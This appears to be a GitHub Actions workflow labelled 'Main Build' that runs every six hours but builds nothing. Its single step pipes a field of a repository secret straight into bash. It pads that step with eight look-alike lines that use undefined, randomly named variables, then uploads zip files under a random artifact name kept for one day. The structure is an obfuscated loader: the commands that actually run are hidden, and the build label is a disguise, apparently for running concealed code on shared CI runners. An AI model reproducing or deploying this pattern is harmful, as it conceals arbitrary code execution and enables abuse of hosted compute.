name: Main Build
on:
  workflow_dispatch:

  schedule:
    - cron: '29 0,6,12,18 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  ci:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Launch
        env:
          qlm2: ${{ secrets.qlm2 }}
        run: |
          printf '%s' "$qlm2" | jq -r .dzqj6 | /bin/bash
          echo $dt74796 | jq -r .jjjp315 | /bin/bash
          printf '%s' "$f0985" | jq -r .examb47563 | /bin/bash
          printf '%s' "$u59" | jq -r .yrj410 | /bin/bash
          echo $f0 | jq -r .raln6414 | /bin/bash
          printf '%s' "$dtndp0" | jq -r .wvpkw14 | /bin/bash
          printf '%s' "$gqzs95" | jq -r .xu7 | /bin/bash
          echo $jdlbv2356 | jq -r .rczcg88 | /bin/bash
          printf '%s' "$xfx67" | jq -r .i62 | /bin/bash

      - name: Save artifact
        uses: actions/upload-artifact@v4
        with:
          name: WduamQch
          path: "*.zip"
          retention-days: 1
